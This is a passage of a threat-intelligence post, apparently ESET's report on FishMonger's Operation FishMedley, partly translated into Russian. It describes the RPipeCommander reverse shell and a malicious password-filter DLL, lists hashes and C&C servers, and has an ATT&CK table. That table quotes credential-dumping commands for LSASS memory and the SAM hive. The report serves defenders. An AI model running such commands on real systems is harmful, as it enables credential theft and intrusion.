width=\"142\"><span>168.100.10[.]136<\/span><\/td>\n<td width=\"438\"><span>MIGJAoGBAJ0EsHDp5vtk23KCxEq0tAocvMwn63vCqq0FVmXsY+fvD0tP6N<wbr><\/wbr>lc7k0lESpB4wGioj2xuhQgcEjXEkYAIPGiefYFovxMPVuzp1FsutZa5SD6<wbr><\/wbr>+4NcTRKsRsrMTZm5tFRuuENoEVmOSy3XoAS00mu4MM5tt7KKDlaczzhYJi<wbr><\/wbr>21PGk5AgMBAAE=<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>RPipeCommander<\/h4>\n<p>At Victim D, we captured a previously unknown implant in the same process where Spyder 
was running. It was probably loaded from disk or downloaded by Spyder. Because its DLL export name was <span>rcmd64.dll<\/span>, we named this implant RPipeCommander.<\/p>\n<p>RPipeCommander is multithreaded and uses <span>IoCompletionPort<\/span> to manage the I\/O requests of the multiple threads. It creates the named pipe <span>\\\\.\\Pipe\\CmdPipe&lt;PID&gt;<\/span>, where <span>&lt;PID&gt;<\/span> is the current process ID, and reads from and writes into this pipe.<\/p>\n<p>RPipeCommander is a reverse shell that accepts three commands via the named pipe:<\/p>\n<ul>\n<li><span>h<\/span> (<span>0x68<\/span>): create a <span>cmd.exe<\/span> process and attach pipes to it for sending commands and reading the output.<\/li>\n<li><span>i<\/span> (<span>0x69<\/span>): write a command to the existing <span>cmd.exe<\/span> process or read the output of the previous command.<\/li>\n<li><span>j<\/span> (<span>0x6A<\/span>): terminate the <span>cmd.exe<\/span> process by writing <span>exit\\r\\n<\/span> to the command line.<\/li>\n<\/ul>\n<p>Note that we only have the server side of RPipeCommander. Most likely, a second component, a client, was used to send commands to the server from another machine on the local network.<\/p>\n<p>Finally, RPipeCommander is written in C++, and RTTI information was included in the captured samples, which allowed us to recover some class names:<\/p>\n<ul>\n<li><span>CPipeServer<\/span><\/li>\n<li><span>CPipeBuffer<\/span><\/li>\n<li><span>CPipeSrvEvent<\/span><\/li>\n<li><span>CPipeServerEventHandler<\/span><\/li>\n<\/ul>\n<h4>Other tools<\/h4>\n<p>In addition to the main implants described above, the attackers used several additional tools to collect or exfiltrate data, which we describe in Table 7.<\/p>\n<p><em>Table 7. Other tools used during Operation FishMedley<\/em><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"151\"><strong>Filename<\/strong><\/td>\n<td width=\"492\"><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"151\"><span>C:\\Windows\\system32\\<wbr><\/wbr>sasetup.dll<\/span><\/td>\n<td width=\"492\">Custom <a href=\"https:\/\/pentestlab.blog\/2020\/02\/10\/credential-access-password-filter-dll\/\">password filter<\/a>. The <span>PasswordChangeNotify<\/span> export is called when a user changes their password, and it writes the new password to disk, in the current working directory, in a log file named <span>etuper.log<\/span>. Note that it can also exfiltrate the password by sending a POST request to a hardcoded C&amp;C server with <span>flag=&lt;password&gt;<\/span> in the POST data.
\u041e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u043d\u0435 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u043c \u043e\u0431\u0440\u0430\u0437\u0446\u0435, \u0438 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043d\u0435\u0442 C&amp;C-\u0441\u0435\u0440\u0432\u0435\u0440\u0430.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>C:Windowsdebug<wbr><\/wbr>svhost.tmp<\/span><\/td>\n<td width=\"492\">\u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u0441\u043a\u0430\u043d\u0435\u0440 fscan, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0439 \u043d\u0430 <a href=\"https:\/\/github.com\/shadow1ng\/fscan\/\">GitHub<\/a>.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>C:nb.exe<\/span><\/td>\n<td width=\"492\"><a href=\"http:\/\/www.unixwiz.net\/tools\/nbtscan.html\">nbtscan<\/a> \u2013 \u0441\u043a\u0430\u043d\u0435\u0440 NetBIOS.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>C:Userspublic<wbr><\/wbr>drop.zip<\/span><\/td>\n<td width=\"492\">\u0421\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0442\u043e\u043b\u044c\u043a\u043e <a href=\"https:\/\/github.com\/dropbox\/dbxcli\/\">dbxcli<\/a> \u2013 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 Go \u0434\u043b\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 Dropbox. 
\u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043e\u043d \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438\u0437 \u0441\u0435\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u044b, \u043d\u043e \u043c\u044b \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043d\u0438\u043a\u0430\u043a\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u0431 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.<br \/>\u041e\u0431\u0440\u0430\u0442\u0438\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0447\u0442\u043e, \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435 <span>.zip<\/span>, \u044d\u0442\u043e CAB-\u0444\u0430\u0439\u043b. 
\u041e\u043d \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0441 <span>http:\/\/45.76.165[.]227\/wECqKe529r.png<\/span>.<br \/>\u0422\u0430\u043a\u0436\u0435 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0447\u0442\u043e dbxcli, \u043f\u043e\u0445\u043e\u0436\u0435, \u0431\u044b\u043b \u0441\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0445\u0435\u0448 (SHA-1: <span>2AD82FFA393937A2353096FE2A2209E0EBC1C9D7<\/span>) \u0438\u043c\u0435\u0435\u0442 \u043e\u0447\u0435\u043d\u044c \u043d\u0438\u0437\u043a\u0443\u044e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>\u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/h2>\n<p>\u0412 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043c\u044b \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0438, \u043a\u0430\u043a FishMonger \u043f\u0440\u043e\u0432\u0435\u043b \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e \u043f\u0440\u043e\u0442\u0438\u0432 \u0432\u044b\u0441\u043e\u043a\u043e\u043f\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443 \u0438 \u0431\u044b\u043b \u043f\u0440\u0435\u0434\u043c\u0435\u0442\u043e\u043c \u043e\u0431\u0432\u0438\u043d\u0435\u043d\u0438\u044f \u041c\u0438\u043d\u0438\u0441\u0442\u0435\u0440\u0441\u0442\u0432\u0430 \u044e\u0441\u0442\u0438\u0446\u0438\u0438 \u0421\u0428\u0410 \u0432 \u043c\u0430\u0440\u0442\u0435 2025 \u0433\u043e\u0434\u0430. 
\u041c\u044b \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0438, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0430 \u043d\u0435 \u0441\u0442\u0435\u0441\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u044b, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a ShadowPad \u0438\u043b\u0438 SodaMaster, \u0434\u0430\u0436\u0435 \u0441\u043f\u0443\u0441\u0442\u044f \u0434\u043e\u043b\u0433\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u043e\u0441\u043b\u0435 \u0438\u0445 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044f. \u041d\u0430\u043a\u043e\u043d\u0435\u0446, \u043c\u044b \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0438, \u0447\u0442\u043e FishMonger \u2014 \u044d\u0442\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0430, \u0432\u0445\u043e\u0434\u044f\u0449\u0430\u044f \u0432 \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u0443\u044e \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044e I\u2011SOON.<\/p>\n<blockquote>\n<div><em>\u041f\u043e \u043b\u044e\u0431\u044b\u043c \u0432\u043e\u043f\u0440\u043e\u0441\u0430\u043c, \u043a\u0430\u0441\u0430\u044e\u0449\u0438\u043c\u0441\u044f \u043d\u0430\u0448\u0438\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0439, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 WeLiveSecurity, \u043f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0441\u0432\u044f\u0436\u0438\u0442\u0435\u0441\u044c \u0441 \u043d\u0430\u043c\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 <a 
href=\"mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>.<\/em><\/div>\n<div><em>ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the <a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=operation-fishmedley&amp;sfdccampaignid=7011n0000017htTAAQ\">ESET Threat Intelligence<\/a> page.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<p><em>A comprehensive list of indicators of compromise (IoCs) and samples can be found in <a href=\"https:\/\/github.com\/eset\/malware-ioc\/tree\/master\/fishmonger\">our GitHub repository<\/a>.<\/em><\/p>\n<h3>Files<\/h3>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"151\"><strong>Filename<\/strong><\/td>\n<td width=\"142\"><strong>Detection<\/strong><\/td>\n<td width=\"170\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span>D61A4387466A0C999981<wbr><\/wbr>086C2C994F2A80193CE3<\/span><\/td>\n<td width=\"151\">N\/A<\/td>\n<td width=\"142\">Win32\/Agent.ADVC<\/td>\n<td width=\"170\">ShadowPad dropper.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>918DDD842787D64B244D<wbr><\/wbr>353BFC0E14CC037D2D97<\/span><\/td>\n<td width=\"151\"><span>log.dll<\/span><\/td>\n<td width=\"142\">Win32\/Agent.ADVC<\/td>\n<td width=\"170\">ShadowPad loader packed with ScatterBee.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>F12C8CEC813257890F48<wbr><\/wbr>56353ABD9F739DEED890<\/span><\/td>\n<td width=\"151\"><span>task.exe<\/span><\/td>\n<td width=\"142\">Win64\/Agent.BEJ<\/td>\n<td width=\"170\">Spyder loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3630F62771360540B667<wbr><\/wbr>01ABC8F6C868087A6918<\/span><\/td>\n<td width=\"151\"><span>DeElevator64<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CU<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3C08C694C222E7346BD8<wbr><\/wbr>633461C5D19EAE18B661<\/span><\/td>\n<td width=\"151\"><span>DrsSDK.dll<\/span><\/td>\n<td width=\"142\">Win64\/Agent.CAC<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>5401E3EF903AFE981CFC<wbr><\/wbr>2840D5F0EF2F1D83B0BF<\/span><\/td>\n<td width=\"151\"><span>safestore64<wbr><\/wbr>.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CU<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>A4F68D0F1C72C3AC9D70<wbr><\/wbr>919C17DC52692C43599E<\/span><\/td>\n<td width=\"151\"><span>libmaxminddb<wbr><\/wbr>-0.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CU<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>D8B631C551845F892EBB<wbr><\/wbr>5E7D09991F6C9D4FACAD<\/span><\/td>\n<td width=\"151\"><span>libvlc.dll<\/span><\/td>\n<td width=\"142\">Win64\/Agent.BFZ<\/td>\n<td width=\"170\">SodaMaster loader.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span>3F5F6839C7DCB1D164E4<wbr><\/wbr>813AF2E30E9461AB35C1<\/span><\/td>\n<td width=\"151\"><span>sasetup.dll<\/span><\/td>\n<td width=\"142\">Win64\/PSW.Agent.CB<\/td>\n<td width=\"170\">Malicious password filter.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Network<\/h3>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"151\"><strong>IP<\/strong><\/td>\n<td width=\"113\"><strong>Domain<\/strong><\/td>\n<td width=\"142\"><strong>Hosting provider<\/strong><\/td>\n<td width=\"85\"><strong>First seen<\/strong><\/td>\n<td width=\"151\"><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"151\"><span>213.59.118[.]124<\/span><\/td>\n<td width=\"113\"><span>api.googleau<wbr><\/wbr>thenticatoro<wbr><\/wbr>nline[.]com<\/span><\/td>\n<td width=\"142\">STARK INDUSTRIES<\/td>\n<td width=\"85\">2022\u201103\u201120<\/td>\n<td width=\"151\">ShadowPad C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>61.238.103[.]165<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">IRT-HKBN-HK<\/td>\n<td width=\"85\">2022\u201103\u201110<\/td>\n<td width=\"151\">Spyder C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>162.33.178[.]23<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">BL Networks<\/td>\n<td width=\"85\">2022\u201103\u201128<\/td>\n<td width=\"151\">SodaMaster C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>78.141.202[.]70<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">The Constant Company<\/td>\n<td width=\"85\">2022\u201105\u201118<\/td>\n<td width=\"151\">SodaMaster C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>192.46.223[.]211<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">Akamai Connected Cloud<\/td>\n<td width=\"85\">2022\u201106\u201122<\/td>\n<td width=\"151\">SodaMaster C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span>168.100.10[.]136<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"142\">BL Networks<\/td>\n<td width=\"85\">2022\u201105\u201112<\/td>\n<td width=\"151\">SodaMaster C&amp;C server.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK techniques<\/h2>\n<p><em>This table was built using <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">version 16<\/a> of the MITRE ATT&amp;CK framework.<\/em><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"642\">\n<thead>\n<tr>\n<td width=\"113\"><strong>Tactic<\/strong><\/td>\n<td width=\"113\"><strong>ID<\/strong><\/td>\n<td width=\"151\"><strong>Name<\/strong><\/td>\n<td width=\"265\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>Resource Development<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1583\/004\">T1583.004<\/a><\/td>\n<td width=\"151\">Acquire Infrastructure: Server<\/td>\n<td width=\"265\">FishMonger rented servers from several hosting providers.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1583\/001\">T1583.001<\/a><\/td>\n<td width=\"151\">Acquire Infrastructure: Domains<\/td>\n<td width=\"265\">FishMonger bought domains and used them for C&amp;C traffic.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Execution<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1059\/001\">T1059.001<\/a><\/td>\n<td width=\"151\">Command and Scripting Interpreter: PowerShell<\/td>\n<td width=\"265\">FishMonger loaded ShadowPad using PowerShell.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1059\/003\">T1059.003<\/a><\/td>\n<td width=\"151\">Command and Scripting Interpreter: Windows Command Shell<\/td>\n<td width=\"265\">FishMonger deployed Spyder using a BAT script.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1072\">T1072<\/a><\/td>\n<td width=\"151\">Software Deployment Tools<\/td>\n<td width=\"265\">FishMonger gained access to the local administrator console and used it to run commands on other machines in the victim\u2019s network.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Persistence<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1543\/003\">T1543.003<\/a><\/td>\n<td width=\"151\">Create or Modify System Process: Windows Service<\/td>\n<td width=\"265\">Some SodaMaster loaders persist via a Windows service.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>Defense Evasion<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1574\/002\">T1574.002<\/a><\/td>\n<td width=\"151\">Hijack Execution Flow: DLL Side-Loading<\/td>\n<td width=\"265\">ShadowPad is loaded by a DLL named <span>log.dll<\/span>, which is side-loaded by a legitimate Bitdefender executable.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1140\">T1140<\/a><\/td>\n<td width=\"151\">Deobfuscate\/Decode Files or Information<\/td>\n<td width=\"265\">ShadowPad, Spyder, and SodaMaster are decrypted and loaded into memory.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>Credential Access<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1555\/003\">T1555.003<\/a><\/td>\n<td width=\"151\">Credentials from Password Stores: Credentials from Web Browsers<\/td>\n<td width=\"265\">Some SodaMaster loaders can extract passwords from the local Firefox database.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1556\/002\">T1556.002<\/a><\/td>\n<td width=\"151\">Modify Authentication Process: Password Filter DLL<\/td>\n<td width=\"265\">FishMonger used a custom password filter DLL that can write passwords to disk or exfiltrate them to a remote server.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1003\/001\">T1003.001<\/a><\/td>\n<td width=\"151\">OS Credential Dumping: LSASS Memory<\/td>\n<td width=\"265\">FishMonger dumped LSASS memory using <span>rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump<\/span>.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1003\/002\">T1003.002<\/a><\/td>\n<td width=\"151\">OS Credential Dumping: Security Account Manager<\/td>\n<td width=\"265\">FishMonger dumped the Security Account Manager using <span>reg save hklm\\sam C:\\users\\public\\music\\sam.hive<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>Discovery<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1087\/001\">T1087.001<\/a><\/td>\n<td width=\"151\">Account Discovery: Local Account<\/td>\n<td width=\"265\">FishMonger ran the <span>net user<\/span> command.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1016\">T1016<\/a><\/td>\n<td width=\"151\">System Network Configuration Discovery<\/td>\n<td width=\"265\">FishMonger ran the <span>ipconfig \/all<\/span> command.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1007\">T1007<\/a><\/td>\n<td width=\"151\">System Service Discovery<\/td>\n<td width=\"265\">FishMonger ran the <span>tasklist \/svc<\/span> command.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1057\">T1057<\/a><\/td>\n<td width=\"151\">Process Discovery<\/td>\n<td width=\"265\">FishMonger ran the <span>tasklist \/v<\/span> command.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Lateral Movement<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1021\/002\">T1021.002<\/a><\/td>\n<td width=\"151\">Remote Services: SMB\/Windows Admin Shares<\/td>\n<td width=\"265\">FishMonger used Impacket to deploy malware on other machines on the local network.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Command and Control<\/strong><\/td>\n<td width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v16\/techniques\/T1095\">T1095<\/a><\/td>\n<td width=\"151\">Non-Application Layer Protocol<\/td>\n<td width=\"265\">ShadowPad communicates over raw TCP and UDP.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p class=\"wls-source\"><a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/operation-fishmedley\/\" rel=\"nofollow noopener\" target=\"_blank\">Read the full analysis on WeLiveSecurity \u2192<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>ESET researchers detail a global espionage operation by FishMonger, the APT group run by 
I\u2011SOON<\/p>\n","protected":false},"author":5,"featured_media":8734,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2891],"tags":[],"class_list":["post-8736","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-issledovaniya-eset"],"acf":[],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/posts\/8736","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/comments?post=8736"}],"version-history":[{"count":1,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/posts\/8736\/revisions"}],"predecessor-version":[{"id":9420,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/posts\/8736\/revisions\/9420"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/media\/8734"}],"wp:attachment":[{"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/media?parent=8736"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/categories?post=8736"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/ru\/wp-json\/wp\/v2\/tags?post=8736"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}